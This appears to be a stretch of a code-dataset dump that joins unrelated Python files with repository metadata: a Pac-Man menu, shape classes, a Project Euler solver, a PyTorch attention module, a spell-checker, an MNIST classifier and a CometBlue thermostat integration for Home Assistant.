        self.pacImage[1] = pygame.transform.flip(self.pacImage[1], True, False)
        self.pacImage[2] = pygame.transform.flip(self.pacImage[2], True, False)
    def blit(self):
        """Draw the menu: title plus either the chase animation or scores."""
        self.screen.fill(self.bg)
        self.screen.blit(self.title, self.titleRect)
        if not self.showHS:
            # Cycle the three mouth frames every ~10 ticks.
            if self.timer %31 <= 10:
                self.screen.blit(self.pacImage[0], self.pacRect)
            elif self.timer %31 <= 20:
                self.screen.blit(self.pacImage[1], self.pacRect)
            elif self.timer %31 <= 30:
                self.screen.blit(self.pacImage[2], self.pacRect)
            # Ghosts are blue (frightened) while Pac-Man chases them leftwards.
            if self.pacDirection == 1:
                self.screen.blit(self.allGhostImage, self.allGhostRect)
            else:
                self.screen.blit(self.allGhostBlueImage, self.allGhostRect)
            self.screen.blit(self.allEyesImage, self.allEyesRect)
            self.names.blit()
        else:
            self.showScores()
    def showScores(self):
        self.prepScores()
        for i in range(len(self.scores)):
            self.screen.blit(self.scoreImages[i], self.scoreRect[i])
    def prepScores(self):
        """Render one text surface per score, stacked vertically."""
        self.scoreImages = []
        self.scoreRect = []
        xShift, yShift = 100, 200
        for score in self.scores:
            tempImage = self.smallFont.render("Score: " + str(score), True, (250, 250, 250))
            self.scoreImages.append(tempImage)
            tempRect = tempImage.get_rect()
            tempRect.x, tempRect.y = xShift, yShift
            yShift += 40
            self.scoreRect.append(tempRect)
    def changeScores(self, newScore):
        # Insert the new score in order and drop the lowest entry so the
        # table keeps its fixed length.
        self.scores.append(newScore)
        self.scores.sort(reverse=True)
        self.scores.pop(len(self.scores) -1)
| [
"Kaine-R@users.noreply.github.com"
] | Kaine-R@users.noreply.github.com |
16fa6b97aea49a877fecdcd880eb57ed74def130 | 97259280efe6466030c10d2d03d0d02b8d1c4a19 | /OOP/lesson_6.py | 5c4d3501b09177dc73d4449f0f73c9be7ea0c8c8 | [] | no_license | Esentur/Python_course | f3923c2ef2bb67ec49b8f20a0c74831fbda11812 | c8ab335f24e01b1017bef176dfa23149ca5e80d3 | refs/heads/master | 2023-02-27T06:51:28.298164 | 2021-01-30T18:43:32 | 2021-01-30T18:43:32 | 332,705,285 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 864 | py | class Shape:
x=0
y=0
def __init__(self,x,y):
self.x=x
self.y=y
def printXY(self):
print('('+str(self.x)+'; '+str(self.y)+')')
def draw(self):
print('Рисуем фигуру')
class Circle(Shape):
r=0
def __init__(self,x,y,r):
Shape.__init__(self,x,y)
self.r=r
def draw(self):
print('Рисуем окружность (x=',self.x,';y=',self.y,';r=',self.r,';)',sep='')
class Rectangle (Shape):
    """Rectangle: a Shape with width and height."""
    # Class-level defaults for the dimensions.
    w = 0
    h = 0
    def __init__(self, x, y, w, h):
        super().__init__(x, y)
        self.w = w
        self.h = h
    def draw(self):
        print(f'Рисуем прямоугольник (x={self.x};y={self.y};w={self.w};h={self.h};)')
# Demo: create one of each figure, draw them, then print their coordinates.
s=Shape(5,7)
s.draw()
c=Circle(10,20,5)
c.draw()
r=Rectangle(0,0,30,50)
r.w=35  # widen the rectangle after construction
r.draw()
s.printXY()
c.printXY()
r.printXY()
"esenturdildebekov8@gmail.com"
] | esenturdildebekov8@gmail.com |
d52a03e2fbb19f94c5e6fb5e3e8ae6b17c26290e | 4584763bde3ecc6fb90aeb65ce341ab286ec4888 | /applications/python.py | 2d76fc6571879da96b39878139092aa48af050a2 | [] | no_license | stefangelova/python-testing | 6800e1a108052730c59bbf5a36600e0b1af86846 | 350e6a76a3f71ad8787dbbebb0825a6571933267 | refs/heads/master | 2021-07-08T16:48:16.888689 | 2020-02-19T15:27:02 | 2020-02-19T15:27:02 | 241,637,133 | 0 | 0 | null | 2021-04-20T19:22:06 | 2020-02-19T14:06:47 | Python | UTF-8 | Python | false | false | 100 | py | import math
number = float(input("Enter a number:"))
answer = math.sqrt(number)
print(answer) | [
"s.angelova.14@aberdeen.ac.uk"
] | s.angelova.14@aberdeen.ac.uk |
2095829a72d1af19ee231c7ec670bf65766c274d | fd625e2ea155455c96261c8656a51be22fe420c8 | /Python/euler035.py | 4400059a3e93b485f3924881b3fe16cd51c435bb | [
"MIT"
] | permissive | AnuragAnalog/project_euler | 9b84a6aa0061ad4582c8d0059c3c1eaddd844fd2 | 8babbefbd5b7008ad24509f24a9d5f50ba208f45 | refs/heads/master | 2021-12-12T12:07:29.338791 | 2021-11-01T04:26:44 | 2021-11-01T04:26:44 | 210,749,964 | 6 | 16 | MIT | 2021-11-01T04:26:45 | 2019-09-25T03:44:37 | Python | UTF-8 | Python | false | false | 1,240 | py | #!/usr/bin/python3
"""
The number, 197, is called a circular prime because all rotations of the digits: 197, 971, and 719, are themselves prime.
There are thirteen such primes below 100: 2, 3, 5, 7, 11, 13, 17, 31, 37, 71, 73, 79, and 97.
How many circular primes are there below one million?
"""
import numpy as np
def isprime(num: int) -> bool:
    """Return True if *num* is a prime number.

    Trial division by every integer up to sqrt(num).  Numbers below 2
    (0, 1 and negatives) are reported as non-prime; the original
    skipped that guard and returned True for them because the divisor
    loop never ran.
    """
    if num < 2:
        return False
    for i in range(2, int(num ** 0.5) + 1):
        if num % i == 0:
            return False
    return True
def rotate(num: int) -> set:
    """Return the set of all digit rotations of *num*, including *num*.

    Example: rotate(197) -> {197, 971, 719}.  Rotations that gain a
    leading zero collapse to smaller integers (e.g. rotate(110)
    contains 11), exactly as the original list-shuffling loop did.
    Implemented idiomatically with string slicing instead of popping
    and re-joining a character list.
    """
    digits = str(num)
    return {int(digits[i:] + digits[:i]) for i in range(len(digits))}
def euler35() -> int:
    """Count the circular primes below one million (Project Euler 35).

    A circular prime stays prime under every rotation of its digits.
    """
    # 2 is the only even circular prime; every other candidate is odd.
    circular = {2}
    for candidate in range(3, 10 ** 6, 2):
        if not isprime(candidate):
            continue
        rotations = rotate(candidate)
        if all(isprime(r) for r in rotations):
            # Record every rotation; the set removes duplicates.
            circular.update(rotations)
    return len(circular)
tot = euler35()
print(tot)
| [
"anurag.peddi1998@gmail.com"
] | anurag.peddi1998@gmail.com |
cd51951988cc830caa77f03f2eeb40d2fcc4bf9b | 209775edcf637e0298e3d675cd4691222f0c80fd | /models/attention.py | 948f8135922664fe52468d3c0f0947b901e5ad77 | [
"MIT"
] | permissive | henghuiding/attMPTI | 8e1bcef35005c945978ad503001afb5bed09c011 | d046b36458a5b0c57b4783e597bb180fccc4ddb2 | refs/heads/main | 2023-04-10T03:04:13.075270 | 2021-04-17T13:58:04 | 2021-04-17T13:58:04 | 358,939,393 | 1 | 0 | MIT | 2021-04-17T17:19:19 | 2021-04-17T17:19:19 | null | UTF-8 | Python | false | false | 1,662 | py | """Self Attention Module
Author: Zhao Na, 2020
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
class SelfAttention(nn.Module):
    """Single-head scaled dot-product self-attention over point features.

    :param in_channel: feature dimension of the input
    :param out_channel: feature dimension of the output; defaults to
        ``in_channel`` when omitted
    :param attn_dropout: dropout probability applied to the attention map
    """

    def __init__(self, in_channel, out_channel=None, attn_dropout=0.1):
        super(SelfAttention, self).__init__()
        self.in_channel = in_channel
        # Fall back to the input width when no output width is given.
        if out_channel is not None:
            self.out_channel = out_channel
        else:
            self.out_channel = in_channel
        # 1/sqrt(d) scaling of the dot products before the softmax.
        self.temperature = self.out_channel ** 0.5
        # Bug fix: the projections previously used the raw ``out_channel``
        # argument, which is None by default and made nn.Conv1d raise a
        # TypeError; they must use the resolved ``self.out_channel``.
        self.q_map = nn.Conv1d(in_channel, self.out_channel, 1, bias=False)
        self.k_map = nn.Conv1d(in_channel, self.out_channel, 1, bias=False)
        self.v_map = nn.Conv1d(in_channel, self.out_channel, 1, bias=False)
        self.dropout = nn.Dropout(attn_dropout)

    def forward(self, x):
        """
        :param x: feature maps from the previous layer,
                  shape (batch_size, in_channel, num_points)
        :return: attended feature maps,
                 shape (batch_size, out_channel, num_points)
        """
        q = self.q_map(x)  # (batch_size, out_channel, num_points)
        k = self.k_map(x)  # (batch_size, out_channel, num_points)
        v = self.v_map(x)  # (batch_size, out_channel, num_points)
        # (batch, num_points, num_points) weights, softmax over keys.
        attn = torch.matmul(q.transpose(1, 2) / self.temperature, k)
        attn = self.dropout(F.softmax(attn, dim=-1))
        y = torch.matmul(attn, v.transpose(1, 2))  # (batch, num_points, out_channel)
        return y.transpose(1, 2)
"zhaona311@gmail.com"
] | zhaona311@gmail.com |
1cb72016f9c456c6294bdc18ee3bb15e889e96e0 | fcb7030ae6da44d6f36a9a166a614952a66937db | /11 user's functions/03 - max 2.py | b7b20317783541603811f5a4b06304305483c54f | [] | no_license | Immaculated/educational_basic | 4b931bb515343a67bf2132a9b97c029c8b8e7e4c | 8ef0de14f0acc12ac172dcaf0ece8bd81b6ade83 | refs/heads/main | 2023-04-22T01:22:54.999075 | 2021-05-02T05:38:26 | 2021-05-02T05:38:26 | 320,326,316 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 68 | py | def max_two(a,b):
return a if a > b else b
print(max_two(3,5)) | [
"noreply@github.com"
] | Immaculated.noreply@github.com |
a7114ae73b29642ae1b3b76a8eca40595de9439d | df7f13ec34591fe1ce2d9aeebd5fd183e012711a | /hata/discord/embed/embed/tests/test__parse_author.py | fb71e365acb11fa7c73817ca0ef5c02ff77884b6 | [
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | HuyaneMatsu/hata | 63e2f6a2d7a7539fd8f18498852d9d3fe5c41d2e | 53f24fdb38459dc5a4fd04f11bdbfee8295b76a4 | refs/heads/master | 2023-08-20T15:58:09.343044 | 2023-08-20T13:09:03 | 2023-08-20T13:09:03 | 163,677,173 | 3 | 3 | Apache-2.0 | 2019-12-18T03:46:12 | 2018-12-31T14:59:47 | Python | UTF-8 | Python | false | false | 481 | py | import vampytest
from ...embed_author import EmbedAuthor
from ..fields import parse_author
def test__parse_author():
"""
Tests whether ``parse_author`` works as intended.
"""
author = EmbedAuthor(name = 'hell')
for input_data, expected_output in (
({}, None),
({'author': None}, None),
({'author': author.to_data()}, author),
):
output = parse_author(input_data)
vampytest.assert_eq(output, expected_output)
| [
"re.ism.tm@gmail.com"
] | re.ism.tm@gmail.com |
706ac6d17f47c1b5d78a4e905d3dbcc02cb0258e | 7bc0db81c58d320a8a143941a46b608b457741ab | /WordDescription.py | 1202b7134ab48bd628f590b9c23e9c135653a15d | [] | no_license | zephyr-fun/Visualization-for-Hidden-Man | 3224a75b38c1a98f1e00659035770ccf07f5ff42 | a8f26aed827499f63172da0ca951d0c766c2ea9f | refs/heads/master | 2020-03-31T13:43:31.137446 | 2018-10-10T07:38:52 | 2018-10-10T07:38:52 | 152,267,125 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,484 | py | import pickle
from os import path
import jieba
import matplotlib.pyplot as plt
from wordcloud import WordCloud, STOPWORDS, ImageColorGenerator
comment = []
with open('xie_zhengsingle.txt',mode='r',encoding='utf-8') as f:
rows = f.readlines()
for row in rows:
if len(row.split(',')) == 5:
comment.append(row.split(',')[4].replace('\n',''))
comment_after_split = jieba.cut(str(comment),cut_all=False)
wl_space_split= " ".join(comment_after_split)
#导入背景图
backgroud_Image = plt.imread('C:\\Users\\16208\\Desktop\\focus\\1.jpg')
stopwords = STOPWORDS.copy()
#可以加多个屏蔽词
stopwords.add("电影")
stopwords.add("一部")
stopwords.add("一个")
stopwords.add("没有")
stopwords.add("什么")
stopwords.add("有点")
stopwords.add("这部")
stopwords.add("这个")
stopwords.add("不是")
stopwords.add("真的")
stopwords.add("感觉")
stopwords.add("觉得")
stopwords.add("还是")
#设置词云参数
#参数分别是指定字体、背景颜色、最大的词的大小、使用给定图作为背景形状
wc = WordCloud(width=1024,height=768,background_color='white',
mask=backgroud_Image,font_path="C:\simhei.ttf",
stopwords=stopwords,max_font_size=400,
random_state=50)
wc.generate_from_text(wl_space_split)
img_colors= ImageColorGenerator(backgroud_Image)
wc.recolor(color_func=img_colors)
plt.imshow(wc)
plt.axis('off')#不显示坐标轴
plt.show()
#保存结果到本地
wc.to_file('quan2.jpg') | [
"noreply@github.com"
] | zephyr-fun.noreply@github.com |
c66e82d6a81b1b34eab48480c0a02eba499d2ddf | 6b3354450b15d0cc42d2beb44ec922aae9d5ac5a | /word_check.py | a3fead6b82acc92286c4e9dc028cbc7f8c914f55 | [] | no_license | goosebones/spellotron | b946a0cb94d32654985a394eb99a7dd5ef46d034 | 2cb70fca1b0ff2b801dba52f1243f4afc1de79a6 | refs/heads/master | 2022-11-13T21:45:21.824589 | 2020-07-08T18:37:26 | 2020-07-08T18:37:26 | 278,166,622 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,070 | py | """
author: Gunther Kroth gdk6217@rit.edu
file: word_check.py
assignment: CS1 Project
purpose: spell check a word
"""
# required modules
from dataclasses import dataclass
import adjacent
import missed
import extra
import string_modify
# golbal variables ------------------------------------------------------------
LEGAL_WORD_FILE = "american-english.txt"
KEY_ADJACENCY_FILE = "keyboard-letters.txt"
ALPHABET = tuple(chr(code) for code in range(ord("a"), ord("z") +1))
LEGAL_WORDS = dict()
ADJACENT_KEYS = dict()
# legal word dictionary
def legal_words_maker(word_file):
""" creates dictionary of legal_words
key and value are identical
dictionary keys are used throughout
:param word_file: file containing dictionary words
preconditions:
word_file has one word per line
postconditions:
LEGAL_WORDS dict is populated
"""
f = open(word_file)
for line in f:
line = line.strip()
LEGAL_WORDS[line] = line
legal_words_maker(LEGAL_WORD_FILE)
# adjacent keys
def adjacent_letter_maker(letter_file):
""" creates dictionary of adjacent keys
each letter is a key
list of every key adjacent to the letter is value
:param letter_file: file with adjacent keys
preconditions:
letter_file has one set of keys per line
postconditions:
ADJACENT_KEYS is populated
"""
f = open(letter_file)
for line in f:
key = line[0]
value = line.split()
ADJACENT_KEYS[key] = value
adjacent_letter_maker(KEY_ADJACENCY_FILE)
# words that have been checked
printed_words = []
# key = incorrect word, value = correct version
fixed_words = dict()
# words that were unable to be fixed
unknown_words = []
# number of words analyzed
word_count = 0
# word dataclass --------------------------------------------------------------
@dataclass
class Word:
    """One token read from the input text.

    word    -- the bare word with surrounding punctuation stripped
    front   -- punctuation removed from the front of the token
    back    -- punctuation removed from the back of the token
    capital -- True when the first letter was upper-case
    """
    __slots__ = "word", "front", "back", "capital"
    word: str
    front: str
    back: str
    capital: bool
def word_maker(word: str) -> "Word":
    """Return a fresh Word wrapping *word*.

    Punctuation fields start empty and capital starts False; word_check
    fills them in while it analyzes the token.

    :param word: raw token to wrap
    """
    return Word(word, "", "", False)
# word analyze ----------------------------------------------------------------
def line_check(line):
    """Spell-check every word of one input line.

    Each token is passed to word_check(); the module-level word_count
    counter is incremented once per token.

    :param line: list of whitespace-split words from one line of input
    """
    global word_count
    for word in line:
        word_check(word)
        # Count every analyzed word, fixed or not.
        word_count += 1
def word_check(word):
""" spell checks a word
accounts for symbols, decimals, punctuation, capitals
used 3 methods to spell check an incorrect word
return None is used as an exit method
:param word: word to analyze
"""
word = word_maker(word)
# 2. decimal digits
for ch in word.word:
if ch.isdigit() == True:
printed_words.append(word.word)
return None
# 3. strip punctuation
word.word, word.front, word.back = string_modify.punctuation_strip(word.word)
# word is all punctuation
if len(word.word) == 0:
punct_word = word.front + word.word + word.back
printed_words.append(punct_word)
return None
# 4. spell check
if word.word in LEGAL_WORDS:
printed_words.append(word.front + word.word + word.back)
return None
# 5. upper case
if word.word[0].isupper() == True:
word.capital = True
if word.capital == True:
first_letter = word.word[0]
word.word = string_modify.lower_case(word.word)
if word.word in LEGAL_WORDS:
word.word = first_letter + word.word[1:]
printed_words.append(word.front + word.word + word.back)
return None
# 6. check using methods
# adjacent key press
adj_bool, fixed_word = adjacent.adjacent_key_press(word.word)
if adj_bool == True:
new = word.front + fixed_word + word.back
old = word.front + word.word + word.back
# 7. case is restored
if word.capital == True:
new = word.front + string_modify.upper_case(fixed_word) + word.back
old = word.front + string_modify.upper_case(word.word) + word.back
printed_words.append(new)
fixed_words[old] = new
return None
# missed key press
miss_bool, fixed_word = missed.missing_key_press(word.word)
if miss_bool == True:
new = word.front + fixed_word + word.back
old = word.front + word.word + word.back
# 7. case is restored
if word.capital == True:
new = word.front + string_modify.upper_case(fixed_word) + word.back
old = word.front + string_modify.upper_case(word.word) + word.back
printed_words.append(new)
fixed_words[old] = new
return None
# extra key press
extra_bool, fixed_word = extra.extra_key_press(word.word)
if extra_bool == True:
new = word.front + fixed_word + word.back
old = word.front + word.word + word.back
# 7. case is restored
if word.capital == True:
new = word.front + string_modify.upper_case(fixed_word) + word.back
old = word.front + string_modify.upper_case(word.word) + word.back
printed_words.append(new)
fixed_words[old] = new
return None
# could not be fixed
unknown_word = word.front + word.word + word.back
# 7. case is restored
if word.capital == True:
unknown_word = word.front + string_modify.upper_case(word.word) + word.back
printed_words.append(unknown_word)
unknown_words.append(unknown_word)
return None
| [
"gdk6217@rit.edu"
] | gdk6217@rit.edu |
73c9b5342eabcb3bb8276cb4376a74f14fefc0e8 | 57929d0fa09388a695b82dc1a7fa06c42eb162d5 | /core/migrations/0001_initial.py | c1803bdd5b889e7b9996542e6de574069f99c66c | [] | no_license | AlexPires1/pontos_turisticos | c4ddd703b3c952ca6e74f52bc3be1149250d966f | 078dc90529d9e0da7af44143acbce85df724e3ff | refs/heads/master | 2022-11-29T03:32:20.320167 | 2019-11-26T17:06:22 | 2019-11-26T17:06:22 | 220,482,293 | 0 | 0 | null | 2022-11-22T04:50:11 | 2019-11-08T14:22:58 | JavaScript | UTF-8 | Python | false | false | 611 | py | # Generated by Django 2.2.7 on 2019-11-08 14:41
from django.db import migrations, models
class Migration(migrations.Migration):
    # Initial schema migration: creates the PontoTuristico table.
    initial = True
    # First migration of the app, so no dependencies.
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='PontoTuristico',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('nome', models.CharField(max_length=150)),
                ('descricao', models.TextField()),
                # New entries start with aprovado=False by default.
                ('aprovado', models.BooleanField(default=False)),
            ],
        ),
    ]
| [
"alexpirespereira747@gmail.com"
] | alexpirespereira747@gmail.com |
df22c26d03c9eb5404718fa0aee45e5b9bfd5116 | 9b422078f4ae22fe16610f2ebc54b8c7d905ccad | /xlsxwriter/test/comparison/test_image01.py | 81559d51c09a291a0dd6ef1c9b9f4f8d5f70ee88 | [
"BSD-2-Clause-Views"
] | permissive | projectsmahendra/XlsxWriter | 73d8c73ea648a911deea63cb46b9069fb4116b60 | 9b9d6fb283c89af8b6c89ad20f72b8208c2aeb45 | refs/heads/master | 2023-07-21T19:40:41.103336 | 2023-07-08T16:54:37 | 2023-07-08T16:54:37 | 353,636,960 | 0 | 0 | NOASSERTION | 2021-04-01T08:57:21 | 2021-04-01T08:57:20 | null | UTF-8 | Python | false | false | 1,149 | py | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2021, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparison_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
    """
    Test file created by XlsxWriter against a file created by Excel.
    """
    def setUp(self):
        # Reference workbook the generated output is compared against.
        self.set_filename('image01.xlsx')
    def test_create_file(self):
        """Test the creation of a simple XlsxWriter file with image(s)."""
        workbook = Workbook(self.got_filename)
        worksheet = workbook.add_worksheet()
        # Anchor the test image at cell E9 of the first worksheet.
        worksheet.insert_image('E9', self.image_dir + 'red.png')
        workbook.close()
        self.assertExcelEqual()
    def test_create_file_in_memory(self):
        """Same workbook assembled with the in_memory option enabled."""
        workbook = Workbook(self.got_filename, {'in_memory': True})
        worksheet = workbook.add_worksheet()
        worksheet.insert_image('E9', self.image_dir + 'red.png')
        workbook.close()
        self.assertExcelEqual()
| [
"jmcnamara@cpan.org"
] | jmcnamara@cpan.org |
3cbcab932761bab25e8cbb4b2de557be22d92ca2 | 282162df26e98a86e3fc33a861889a168be74fa2 | /Digit Recognition/digit.py | 2c05cad855d0ab45ddf31ce53536adf1ff9b7ac5 | [] | no_license | poojashri13/Analytics-Vidhya | 5cacde282c0aa83470b6425124c2f430ec72611a | 76210d4cf652499c90ff040b5835c5570bf0d15e | refs/heads/master | 2020-03-26T09:48:01.067539 | 2018-08-14T20:07:41 | 2018-08-14T20:07:41 | 144,765,577 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,566 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Sep 6 14:49:29 2017
@author: pshrivas
"""
import numpy as np
import pandas as pd
train_set = pd.read_csv("train.csv")
test_set = pd.read_csv("test.csv")
train_y = train_set.iloc[:,0].values
#Feature scaling
from sklearn.preprocessing import StandardScaler
sc_x = StandardScaler()
training_set = train_set.iloc[:,1:].values
x_train = sc_x.fit_transform(training_set)
x_test = sc_x.transform(test_set)
from sklearn.decomposition.pca import PCA
pca = PCA(n_components=15)
x_train = pca.fit_transform(x_train)
x_test = pca.transform(x_test)
explained_valriance = pca.explained_variance_ratio_
##Fitting Logistic regression to the training set
from sklearn.linear_model import LogisticRegression
classifier = LogisticRegression(random_state=0)
classifier.fit(x_train,train_y)
#
#y_pred = classifier.predict(x_test)
#digit = pd.DataFrame()
#digit["ImageId"]=range(1,len(test_set)+1)
#digit["Label"] = y_pred
#digit.to_csv("sub4.csv",index=False)
from sklearn.ensemble import RandomForestClassifier
classifier = RandomForestClassifier(n_estimators=10, criterion="entropy",random_state=0)
classifier.fit(x_train,train_y)
#Applying k-fold cross validation
from sklearn.model_selection import cross_val_score
accuracies = cross_val_score(estimator = classifier, X = x_train, y = train_y, cv = 10)
accuracies.mean()
accuracies.std()
#Fitting Random Forest
y_pred = classifier.predict(x_test)
digit = pd.DataFrame()
digit["ImageId"]=range(1,len(test_set)+1)
digit["Label"] = y_pred
digit.to_csv("subl280.csv",index=False) | [
"poojashrivastava51@gmail.com"
] | poojashrivastava51@gmail.com |
1d39f6538090cd646687b5aa96201d588b4bbdfe | 75959a00cd8e1d2b9ae92c4e4f00d7606e09ce29 | /climate.py | cd1d166ee127d3feec6d8c8c68d2101fdcfd48ad | [] | no_license | danielkucera/hass-cometblue | fce1d2a89ede5287cbdd22811aac5b8861d03d95 | 99364407662b59f37bb8ab9589ddfea93997c0b5 | refs/heads/master | 2020-04-27T17:42:57.358343 | 2019-03-08T12:27:09 | 2019-03-08T12:27:09 | 174,533,786 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,059 | py | """
Support for Eurotronic CometBlue thermostats.
They are identical to the Xavax Bluetooth thermostats and others, e.g. sold by discounters.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/climate.cometblue/
"""
import logging
from datetime import timedelta
from datetime import datetime
import threading
import voluptuous as vol
from sys import stderr
from homeassistant.components.climate import (
ClimateDevice,
PLATFORM_SCHEMA,
STATE_ON,
STATE_OFF,
SUPPORT_TARGET_TEMPERATURE_HIGH,
SUPPORT_TARGET_TEMPERATURE_LOW,
SUPPORT_OPERATION_MODE)
from homeassistant.const import (
CONF_NAME,
CONF_MAC,
CONF_PIN,
CONF_DEVICES,
TEMP_CELSIUS,
ATTR_TEMPERATURE,
PRECISION_HALVES)
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['cometblue']
_LOGGER = logging.getLogger(__name__)
_LOGGER.setLevel(10)
MIN_TIME_BETWEEN_UPDATES = timedelta(seconds=300)
SCAN_INTERVAL = timedelta(seconds=300)
STATE_AUTO_LOCKED = "auto_locked"
STATE_AUTO = "auto"
STATE_MANUAL = "manual"
STATE_MANUAL_LOCKED = "manual_locked"
ATTR_STATE_WINDOW_OPEN = 'window_open'
ATTR_STATE_VALVE = 'valve'
ATTR_STATE_LOCKED = 'is_locked'
ATTR_STATE_LOW_BAT = 'low_battery'
ATTR_BATTERY = 'battery_level'
ATTR_TARGET = 'target_temp'
ATTR_VENDOR_NAME = 'vendor_name'
ATTR_MODEL = 'model'
ATTR_FIRMWARE = 'firmware'
ATTR_VERSION = 'version'
ATTR_WINDOW = 'window_open'
DEVICE_SCHEMA = vol.Schema({
vol.Required(CONF_MAC): cv.string,
vol.Optional(CONF_PIN, default=0): cv.positive_int,
})
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_DEVICES):
vol.Schema({cv.string: DEVICE_SCHEMA}),
})
SUPPORT_FLAGS = (SUPPORT_OPERATION_MODE)
from cometblue import device as cometblue_dev
gatt_mgr = None
def setup_platform(hass, config, add_devices, discovery_info=None):
    """Set up the CometBlue climate platform from YAML configuration.

    Creates one shared BLE manager on adapter 'hci0', runs its blocking
    event loop on a background thread, then registers one
    CometBlueThermostat per configured device.
    """
    global gatt_mgr
    _LOGGER.debug("setup cometblue")
    gatt_mgr = cometblue_dev.CometBlueManager('hci0')
    class ManagerThread(threading.Thread):
        # gatt_mgr.run() blocks, so it gets a thread of its own.
        def run(self):
            gatt_mgr.run()
    ManagerThread().start()
    devices = []
    for name, device_cfg in config[CONF_DEVICES].items():
        _LOGGER.debug("adding device: {}".format(name))
        dev = CometBlueThermostat(device_cfg[CONF_MAC], name, device_cfg[CONF_PIN])
        devices.append(dev)
    add_devices(devices)
class CometBlueStates():
    """One snapshot of a CometBlue thermostat's state.

    The thermostat entity keeps two instances: the state last read from
    the device and the state the user wants written back to it.
    """

    # Bit masks of the device status byte.
    BIT_MANUAL = 0x01
    BIT_LOCKED = 0x80
    BIT_WINDOW = 0x10

    def __init__(self):
        self._temperature = None      # measured room temperature
        self.target_temp = None       # requested set-point
        self.manual = None            # manual (True) vs. schedule mode
        self.locked = None            # child lock engaged
        self.window = None            # open-window detection flag
        self._battery_level = None    # battery charge, 0-100 percent
        self.manufacturer = None
        self.software_rev = None
        self.firmware_rev = None
        self.model_no = None
        self.name = None
        self.last_seen = None         # datetime of last sighting
        self.last_talked = None       # datetime of last GATT exchange

    @property
    def temperature_value(self):
        """Dict in the layout cometblue's set_temperatures() expects."""
        val = {
            'manual_temp': self.target_temp,
            'current_temp': self.temperature,
            'target_temp_l': 16,
            'target_temp_h': 21,
            'offset_temp': 0.0,
            'window_open_detection': 12,
            'window_open_minutes': 10
        }
        return val

    @property
    def mode_value(self):
        """Dict in the layout cometblue's set_status() expects."""
        val = {
            'not_ready': None,
            'childlock': self.locked,
            'state_as_dword': None,
            'manual_mode': self.manual,
            'adapting': None,
            'unused_bits': None,
            'low_battery': None,
            'antifrost_activated': None,
            'motor_moving': None,
            'installing': None,
            'satisfied': None
        }
        return val

    @mode_value.setter
    def mode_value(self, value):
        """Adopt mode flags from a cometblue get_status() dict."""
        self.manual = value['manual_mode']
        self.window = False
        self.locked = value['childlock']

    @property
    def mode_code(self):
        """Map the (manual, locked) flags onto one of the HA mode strings."""
        if self.manual is None or self.locked is None:
            return None
        if self.manual:
            return STATE_MANUAL_LOCKED if self.locked else STATE_MANUAL
        return STATE_AUTO_LOCKED if self.locked else STATE_AUTO

    @mode_code.setter
    def mode_code(self, value):
        """Split an HA mode string back into the (manual, locked) flags."""
        if value == STATE_MANUAL:
            self.manual = True
            self.locked = False
        elif value == STATE_MANUAL_LOCKED:
            self.manual = True
            self.locked = True
        elif value == STATE_AUTO:
            self.manual = False
            self.locked = False
        elif value == STATE_AUTO_LOCKED:
            self.manual = False
            self.locked = True

    @property
    def battery_level(self):
        return self._battery_level

    @battery_level.setter
    def battery_level(self, value):
        # Ignore readings outside the plausible 0-100 % range.
        if value is not None and 0 <= value <= 100:
            self._battery_level = value

    @property
    def temperature(self):
        return self._temperature

    @temperature.setter
    def temperature(self, value):
        # Bug fix: the original condition read ``8 <= 28`` (always true),
        # accepting any value.  Mirror the battery_level setter and keep
        # only readings inside the device's 8-28 degC operating range
        # (the entity's min_temp/max_temp).
        if value is not None and 8 <= value <= 28:
            self._temperature = value
class CometBlueThermostat(ClimateDevice):
"""Representation of a CometBlue thermostat."""
def __init__(self, _mac, _name, _pin=None):
"""Initialize the thermostat."""
global gatt_mgr
self.modes = [STATE_AUTO, STATE_AUTO_LOCKED, STATE_MANUAL, STATE_MANUAL_LOCKED]
self._mac = _mac
self._name = _name
self._pin = _pin
self._thermostat = cometblue_dev.CometBlue(_mac, gatt_mgr, _pin)
self._target = CometBlueStates()
self._current = CometBlueStates()
self.update()
# def __del__(self):
# self._thermostat.disconnect()
@property
def supported_features(self):
"""Return the list of supported features."""
return SUPPORT_FLAGS
@property
def available(self) -> bool:
"""Return if thermostat is available."""
return True
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def temperature_unit(self):
"""Return the unit of measurement that is used."""
return TEMP_CELSIUS
@property
def precision(self):
"""Return cometblue's precision 0.5."""
return PRECISION_HALVES
@property
def current_temperature(self):
"""Return current temperature"""
return self._current.temperature
@property
def target_temperature(self):
"""Return the temperature we try to reach."""
return self._target.target_temp
def set_temperature(self, **kwargs):
"""Set new target temperature."""
temperature = kwargs.get(ATTR_TEMPERATURE)
if temperature is None:
return
if temperature < self.min_temp:
temperature = self.min_temp
if temperature > self.max_temp:
temperature = self.max_temp
self._target.target_temp = temperature
@property
def min_temp(self):
"""Return the minimum temperature."""
# return self._thermostat.min_temp
return 8.0
@property
def max_temp(self):
"""Return the maximum temperature."""
# return self._thermostat.max_temp
return 28.0
@property
def current_operation(self):
"""Current mode."""
return self._current.mode_code
@property
def operation_list(self):
"""List of available operation modes."""
return self.modes
def set_operation_mode(self, operation_mode):
"""Set operation mode."""
self._target.mode_code = operation_mode
def is_stale(self):
_LOGGER.info(
"{} last seen {} last talked {}".format(self._mac, self._current.last_seen, self._current.last_talked))
now = datetime.now()
if self._current.last_seen is not None and (now - self._current.last_seen).total_seconds() < 600:
return False
